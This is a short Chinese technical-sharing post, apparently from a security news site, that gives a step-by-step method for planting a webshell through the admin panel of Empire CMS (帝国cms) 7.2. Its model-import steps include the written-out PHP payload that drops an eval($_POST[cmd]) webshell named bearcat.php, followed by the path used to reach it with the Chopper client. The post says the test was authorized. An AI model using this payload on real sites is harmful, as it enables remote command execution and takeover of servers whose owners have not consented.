【技术分享】帝国cms 7.2 后台 GetShell

释放双眼,带上耳机,听听看~!
帝国cms7.2后台GetShell0x01        今天帮测一个授权站点,拿到了后台登陆信息,进入后台准备拿WebShell。0x02      

帝国cms 7.2 后台 GetShell

0x01

        今天帮测一个授权站点,拿到了后台登陆信息,进入后台准备拿WebShell。

0x02

        1.进入后台

image.png

        2.系统设置——数据表与系统模型——管理数据表——管理系统模型——导入系统模型

image.png

        3.在本地新建1.php.mod文件,利用fopen函数写出一个bearcat.php文件,文件内容为fopen函数第二个参数值),然后保存。

<?fputs(fopen("bearcat.php","w"),"<?eval(\$_POST[cmd]);?>")?>

image.png

        4.导入模型

image.png

        5.访问http://www.xxx.com/e/admin/bearcat.php 菜刀连接。

image.png

给TA买糖
共{{data.count}}人
人已赞赏
HackerNews

蹭你wifi后 我竟然干了这样的事

2017-10-16 6:35:26

HackerNews

WPA2爆出漏洞对我们影响大不大?听专家怎么说

2017-10-17 3:30:13

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索